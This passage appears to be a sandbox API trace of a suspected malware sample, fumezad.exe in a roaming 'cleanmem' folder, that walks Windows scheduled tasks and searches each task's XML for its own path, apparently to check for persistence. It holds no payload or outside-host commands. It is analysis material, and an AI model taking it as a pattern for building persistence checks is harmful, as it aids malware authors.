ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.515] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="UpdateRecordPath") returned 0x0 [0228.515] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\UpdateRecordPath\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoUpdateRecordPath $(Arg0)\r\n \r\n \r\n") returned 0x0 [0228.517] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\UpdateRecordPath\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoUpdateRecordPath $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.538] IUnknown:Release (This=0x297030) returned 0x0 [0228.538] IUnknown:Release (This=0x296ee0) returned 0x0 [0228.538] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ee0) returned 0x0 [0228.539] ITaskFolderCollection:get_Count (in: This=0x296ee0, pCount=0x12e008 | out: pCount=0x12e008*=1) returned 0x0 [0228.539] ITaskFolderCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x12de80 | out: ppFolder=0x12de80*=0x297040) returned 0x0 [0228.539] ITaskFolder:GetTasks (in: This=0x297040, flags=1, ppTasks=0x12dd00 | out: ppTasks=0x12dd00*=0x299540) returned 0x0 [0228.540] IRegisteredTaskCollection:get_Count (in: This=0x299540, pCount=0x12de60 | out: pCount=0x12de60*=0) returned 0x0 [0228.540] IUnknown:Release (This=0x299540) returned 0x0 [0228.540] ITaskFolder:GetFolders (in: This=0x297040, flags=0, ppFolders=0x12dd08 | out: ppFolders=0x12dd08*=0x299540) returned 0x0 [0228.541] ITaskFolderCollection:get_Count (in: This=0x299540, pCount=0x12de78 | out: pCount=0x12de78*=0) returned 0x0 [0228.541] IUnknown:Release (This=0x299540) returned 0x0 [0228.541] TaskScheduler:IUnknown:Release (This=0x297040) returned 0x0 [0228.541] IUnknown:Release (This=0x296ee0) returned 0x0 [0228.541] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.541] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.541] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ee0) returned 0x0 [0228.543] IRegisteredTaskCollection:get_Count (in: This=0x296ee0, pCount=0x12dff0 | out: pCount=0x12dff0*=2) returned 0x0 [0228.543] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297040) returned 0x0 [0228.543] IRegisteredTask:get_Name (in: This=0x297040, pName=0x12dea0 | out: pName=0x12dea0*="CorruptionDetector") returned 0x0 [0228.543] IRegisteredTask:get_Xml (in: This=0x297040, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Application Popup'] and EventID=1801]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n") returned 0x0 [0228.545] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Application Popup'] and EventID=1801]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.571] IUnknown:Release (This=0x297040) returned 0x0 [0228.571] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297040) returned 0x0 [0228.571] IRegisteredTask:get_Name (in: This=0x297040, pName=0x12dea0 | out: pName=0x12dea0*="DecompressionFailureDetector") returned 0x0 [0228.571] IRegisteredTask:get_Xml (in: This=0x297040, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"><Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\">*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n") returned 0x0 [0228.573] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\memdiag.dll,-230)\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-231)\r\n \\Microsoft\\Windows\\MemoryDiagnostic\\DecompressionFailureDetector\r\n O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\system32\\memdiag.dll,-232)\r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\"><Select Path=\"Microsoft-Windows-Kernel-StoreMgr/Operational\">*[System[Provider[@Name='Microsoft-Windows-Kernel-StoreMgr'] and EventID=6]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {190BA3F6-0205-4f46-B589-95C6822899D2}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.602] IUnknown:Release (This=0x297040) returned 0x0 [0228.602] IUnknown:Release (This=0x296ee0) returned 0x0 [0228.602] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ee0) returned 0x0 [0228.604] ITaskFolderCollection:get_Count (in: This=0x296ee0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0228.604] IUnknown:Release (This=0x296ee0) returned 0x0 [0228.604] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.604] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.604] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0228.606] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0228.606] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0228.606] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="HotStart") returned 0x0 [0228.606] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)\r\n Microsoft\\Windows\\MobilePC\\HotStart\r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n \r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n {06DA0625-9701-43da-BFD7-FBEEA2180A1E}\r\n \r\n \r\n") returned 0x0 [0228.608] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-500)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-501)\r\n $(@%SystemRoot%\\system32\\HotStartUserAgent.dll,-502)\r\n Microsoft\\Windows\\MobilePC\\HotStart\r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n \r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n {06DA0625-9701-43da-BFD7-FBEEA2180A1E}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.634] IUnknown:Release (This=0x297020) returned 0x0 [0228.634] IUnknown:Release (This=0x296ed0) returned 0x0 [0228.634] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0228.636] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0228.636] IUnknown:Release (This=0x296ed0) returned 0x0 [0228.636] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.636] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.636] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0228.637] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0228.637] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297010) returned 0x0 [0228.638] IRegisteredTask:get_Name (in: This=0x297010, pName=0x12dea0 | out: pName=0x12dea0*="LPRemove") returned 0x0 [0228.638] IRegisteredTask:get_Xml (in: This=0x297010, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-101)\r\n Microsoft\\Windows\\MUI\\LPRemove\r\n \r\n \r\n \r\n PT25M\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT9H\r\n \r\n \r\n \r\n %windir%\\system32\\lpremove.exe\r\n \r\n \r\n") returned 0x0 [0228.639] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-100)\r\n $(@%systemRoot%\\System32\\lpremove.exe,-101)\r\n Microsoft\\Windows\\MUI\\LPRemove\r\n \r\n \r\n \r\n PT25M\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n PT9H\r\n \r\n \r\n \r\n %windir%\\system32\\lpremove.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.664] IUnknown:Release (This=0x297010) returned 0x0 [0228.664] IUnknown:Release (This=0x296ed0) returned 0x0 [0228.664] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0228.665] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0228.665] IUnknown:Release (This=0x296ed0) returned 0x0 [0228.665] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.665] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x11, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.665] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ee0) returned 0x0 [0228.666] IRegisteredTaskCollection:get_Count (in: This=0x296ee0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0228.667] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.667] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="SystemSoundsService") returned 0x0 [0228.667] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n 2005-06-23T13:48:00-08:00\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)\r\n Microsoft\\Windows\\Multimedia\\SystemSoundsService\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)\r\n \r\n \r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n \r\n \r\n") returned 0x0 [0228.668] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-06-23T13:48:00-08:00\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-105)\r\n Microsoft\\Windows\\Multimedia\\SystemSoundsService\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)\r\n $(@%systemRoot%\\System32\\PlaySndSrv.Dll,-106)\r\n \r\n \r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.689] IUnknown:Release (This=0x297030) returned 0x0 [0228.689] IUnknown:Release (This=0x296ee0) returned 0x0 [0228.689] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ee0) returned 0x0 [0228.690] ITaskFolderCollection:get_Count (in: This=0x296ee0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0228.690] IUnknown:Release (This=0x296ee0) returned 0x0 [0228.690] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.690] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.690] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0228.692] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0228.692] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0228.692] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="GatherNetworkInfo") returned 0x0 [0228.692] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n \\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6910)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6911)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6912)\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n 7\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\gatherNetworkInfo.vbs\r\n $(Arg1)\r\n \r\n \r\n") returned 0x0 [0228.693] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6910)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6911)\r\n $(@%SystemRoot%\\system32\\nettrace.dll,-6912)\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n 7\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\gatherNetworkInfo.vbs\r\n $(Arg1)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.714] IUnknown:Release (This=0x297020) returned 0x0 [0228.714] IUnknown:Release (This=0x296ed0) returned 0x0 [0228.714] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0228.715] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0228.715] IUnknown:Release (This=0x296ed0) returned 0x0 [0228.715] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.716] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.716] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ef0) returned 0x0 [0228.717] IRegisteredTaskCollection:get_Count (in: This=0x296ef0, pCount=0x12dff0 | out: pCount=0x12dff0*=0) returned 0x0 [0228.717] IUnknown:Release (This=0x296ef0) returned 0x0 [0228.717] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ef0) returned 0x0 [0228.717] ITaskFolderCollection:get_Count (in: This=0x296ef0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0228.717] IUnknown:Release (This=0x296ef0) returned 0x0 [0228.717] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.717] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.718] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ee0) returned 0x0 [0228.719] IRegisteredTaskCollection:get_Count (in: This=0x296ee0, pCount=0x12dff0 | out: pCount=0x12dff0*=2) returned 0x0 [0228.719] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297040) returned 0x0 [0228.720] IRegisteredTask:get_Name (in: This=0x297040, pName=0x12dea0 | out: pName=0x12dea0*="Background Synchronization") returned 0x0 [0228.720] IRegisteredTask:get_Xml (in: This=0x297040, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5003)\r\n \\Microsoft\\Windows\\Offline Files\\Background Synchronization\r\n \r\n \r\n \r\n \r\n PT360M\r\n false\r\n \r\n 2008-01-01T00:00:00\r\n true\r\n PT60M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n") returned 0x0 [0228.722] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5003)\r\n \\Microsoft\\Windows\\Offline Files\\Background Synchronization\r\n \r\n \r\n \r\n \r\n PT360M\r\n false\r\n \r\n 2008-01-01T00:00:00\r\n true\r\n PT60M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.753] IUnknown:Release (This=0x297040) returned 0x0 [0228.753] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297040) returned 0x0 [0228.753] IRegisteredTask:get_Name (in: This=0x297040, pName=0x12dea0 | out: pName=0x12dea0*="Logon Synchronization") returned 0x0 [0228.753] IRegisteredTask:get_Xml (in: This=0x297040, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n \\Microsoft\\Windows\\Offline Files\\Logon Synchronization\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5002)\r\n \r\n \r\n \r\n true\r\n PT4M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n \r\n") returned 0x0 [0228.755] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Offline Files\\Logon Synchronization\r\n 1.0\r\n $(@%systemroot%\\system32\\cscui.dll,-5000)\r\n $(@%systemroot%\\system32\\cscui.dll,-5001)\r\n $(@%systemroot%\\system32\\cscui.dll,-5002)\r\n \r\n \r\n \r\n true\r\n PT4M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.777] IUnknown:Release (This=0x297040) returned 0x0 [0228.777] IUnknown:Release (This=0x296ee0) returned 0x0 [0228.777] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ee0) returned 0x0 [0228.779] ITaskFolderCollection:get_Count (in: This=0x296ee0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0228.779] IUnknown:Release (This=0x296ee0) returned 0x0 [0228.779] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.779] 